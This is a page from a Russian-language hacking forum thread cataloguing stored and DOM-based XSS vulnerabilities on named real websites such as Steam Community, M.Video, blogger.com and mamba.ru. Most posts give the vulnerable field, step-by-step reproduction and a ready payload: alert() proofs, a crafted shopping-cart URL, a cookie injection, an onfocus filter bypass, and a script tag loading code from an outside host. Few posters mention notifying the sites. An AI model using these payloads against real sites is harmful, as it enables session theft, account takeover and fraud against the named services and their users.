Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. Timon132009

    Timon132009 Member

    Joined:
    7 Jun 2009
    Messages:
    137
    Likes Received:
    19
    Reputations:
    0
    http://steamcommunity.com
    XSS в событиях группы.
    Уязвимое поле "Название события:"
    Code:
    "><script>alert(/XSS/)</script>
    [​IMG]
     
    #441 Timon132009, 8 Jan 2012
    Last edited: 8 Jan 2012
    1 person likes this.
  2. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    zzima.com | Active xss
    Тиц: 475;
    Пр: 4;

    При создании группы(http://www.zzima.com/createGroup)
    Отсутствует фильтрация в поле "Веб сайт".
    [​IMG]
    + Там есть функция - пригласить в группу.
     
    #442 justonline, 16 Jan 2012
    Last edited: 16 Jan 2012
  3. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    tiu.ru

    tiu.ru

    тиц 5600
    траф 40 000~


    [​IMG]

    1) Заходим на сайт
    2) сверху жмякаем "Добавить компанию"
    3) Уязвимое поле "Название компании"

    а вообще все поля уязвимы, только надо шифроваться
     
  4. Unix@

    Unix@ New Member

    Joined:
    25 Sep 2011
    Messages:
    0
    Likes Received:
    3
    Reputations:
    6
    Russia.ru

    Активная xss в теле письма на russia.ru
    Сайт Почта

    [​IMG]

    В теле письма отправляем код
    PHP:
    <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
     
    2 people like this.
  5. hic991

    hic991 New Member

    Joined:
    28 Jan 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Активная XSS на qchat.su
    Уязвимое поле Тема билета

    Code:
    "><script>alert(/XSS/)</script>
    [​IMG]

    Сайт снова открыт, на главной странице сообщение о взломе аккаунтов и переводе с них денег. Уязвимость закрыта. Ищу другую
     
    #445 hic991, 29 Jan 2012
    Last edited: 5 Feb 2012
  6. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    берлога.net - развлекательный сайт, торрент-трекер
    pr: 3
    тиц: 250
    статистика согласно бигмирнет
    хостов Сегодня 62 803
    хостов Вчера 143 702
    уязвимое поле, в анкете «музыкальные предпочтения»
    [​IMG]
    также на сайте csrf на смену пароля, и множество пасивок, обход лимита на добавление релизов, заливка файлов php вместо картинок (загрузка через флешплеер, и фильтрация расширений только при выборе, то есть на js) только вот не выполняются они, а скачиваются в оригинале, но может кто найдёт lfi ;)
     
    2 people like this.
  7. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    molnet.ru - статьи по жизненным ситуациям в Москве
    тИЦ - 900

    Уязвимый код: <script>alert('XSS')</script>

    1) Регистрируемся
    2) Заходим в свой профиль
    3) Добавляем комментарий с уязвимым кодом и обновляем страницу

    [​IMG]
     
  8. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    М.Видео – бытовая техника и электроника по доступным ценам. Удобный интернет-магазин.
    тИЦ - 2200

    Добавляем уязвимый код:
    Code:
    http://www.mvideo.ru/homeshop/?p=cart&step=0&_recount=0&droppayment=1&delivery_type_20024096=1&ids%5B20024096%5D=1&cert_cb%5B20024096%5D=0&city_zones_id=0&promo_code_value="><script>alert('xss')</script>&promo_code=1
    Переходим сюда:
    Code:
    http://www.mvideo.ru/homeshop/?p=cart
    + XSS из-за недостаточной фильтрации в Cookie
    Уязвимое место:
    Code:
    phorum_name:"><script>alert('xss')</script>;
    Переходим в любую тему на форуме М.Видео и XSS выполняется.
    Скриншот:
    [​IMG]

    + Еще одна активка
    1) Регистрируемся в системе
    2) Заходим в свой профиль
    3) Добавляем адрес доставки
    Уязвимые поля: Корпус (cтроение), Подъезд, Телефон 2, Факс
    Уязвимый код:
    Code:
    "><script>alert('xss')</script>
    Скриншот:
    [​IMG]
     
    #448 kravch_v, 5 Feb 2012
    Last edited: 5 Feb 2012
  9. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Serva4ok - игровой хостинг.
    тИЦ - 100

    1) Регистрируемся на сайте
    2) Создаем свою команду
    После создания команды, переходим в Наш состав => [подробный список]
    Редактировать игрока => id[ваш_id] => Выполнить
    Уязвимое поле: Отзыв капитана команды
    Уязвимый код:
    Code:
    <script>alert('xss')</script>
    Пример:
    Code:
    http://www.serva4ok.ru/index.php?do=profiler&act=fight_logs&file_id=82546
    [​IMG]
     
    1 person likes this.
  10. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Olike - Бесплатные сердечки ВКонтакте (популярен среди любителей "лайков").

    Уязвимый код:
    Code:
    "><script>alert(/xss/)</script>
    Жмякаем на "Использовать Лайки"
    В поле "Название страницы" пишем наш уязвимый код.
    После чего переходим в "Мои Заказы" и наша XSS выполняется.

    [​IMG]
     
  11. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Drive2.ru - все автомобили мира: отзывы, фото, видео, блоги.
    тИЦ - 1100

    Уязвимый код:
    Code:
    <script>alert('xss')</script>
    1) Проходим авторизацию на сайте
    2) Жмякаем "Написать" => "в мой блог"
    3) Добавляем уязвимый код в поле "Ключевые слова (метки)"
    [​IMG]
     
  12. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Wellpay - система приятных электронных платежей.
    Тип: DOM-based

    Уязвимый код:
    Code:
    <script>alert('xss')</script>
    1) Переходим в раздел "Мои кошельки".
    2) Меняем название нашего кошелька на уязвимый код.

    [​IMG]
     
  13. Radiant

    Radiant New Member

    Joined:
    16 Apr 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Спрашивай.ру - популярный ресурс у девочек вконтакте и их поклонников(так же и адекватный народ сидит, но зачем?)
    url: http://sprashivai.ru
    тИц: 275
    Pr: 4

    Уязвимое поле записи своих "мыслей".
    Фильтруются теги при постинге, но c помощью
    Code:
    " [COLOR=red]autofocus/onfocus="alert(123)"[/COLOR]
    для тега input можем выполнить произвольный js код.
    [​IMG]
    Предотвращая вопросы в ЛС -
    [​IMG]
     
    #453 Radiant, 17 Apr 2012
    Last edited: 17 Apr 2012
    1 person likes this.
  14. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    Доменная зона Vip-file.Нашел 25.11.2009, еще жива

    Code:
    http://sms4file.com/ftp/autor.php
    
    Логин: "><script>alert(/t3cHn0iD/)</script>
    Пароль: "><script>alert(/t3cHn0iD/)</script>
     
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    .directadvert.ru

    Тизерная сеть directadvert.ru

    Уязвимые поля: Название тизера,текст тизера
    код
     
    _________________________
  16. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    боян
    http://forum.antichat.ru/showpost.php?p=2841182&postcount=440
     
  17. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    http://www.metalinfo.ru/
    комментарии к новостям
    алерты проходят по имени и тексту сообщения
    <script>alert()</script> :p
     
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    XSS mamba.ru
    Яндекс тИЦ 3 100
    Пр 6
    Понравилась сама реализация :)
    У мамбы есть ифрейм приложение для контакта.
    Так вот, при аплоаде фотки с альбома(ВКОНТАКТЕ) возможен выбор альбома(из существующих у пользователя)
    Называем альбом <script>alert(тэкст)</script>
    Заходим, обновляемся и вуаля...
    [​IMG]
    При том, что на самом сайте дико фильтруют все что можно :)
    Практической реализации почти нет. только если для соц инжа.

    Предупредил разрабочтиков.
    Не знают ребята, что такое имидж. :)
     
    #458 justonline, 26 Apr 2012
    Last edited: 26 Apr 2012
  19. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    blogger.com
    XSS DOM-BASED

    Дефолтный шаблон.
    Создаём новость -> добавляем алерт -> сохраняем -> выбираем вид: "Timeslide" или "Magazine" -> Profit!

    [​IMG]

    [​IMG]

    [​IMG]
     
    1 person likes this.
  20. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    140
    Likes Received:
    13
    Reputations:
    0

    Прила на совершенно другом домене. Так что по сути это ничего не дает
     
    1 person likes this.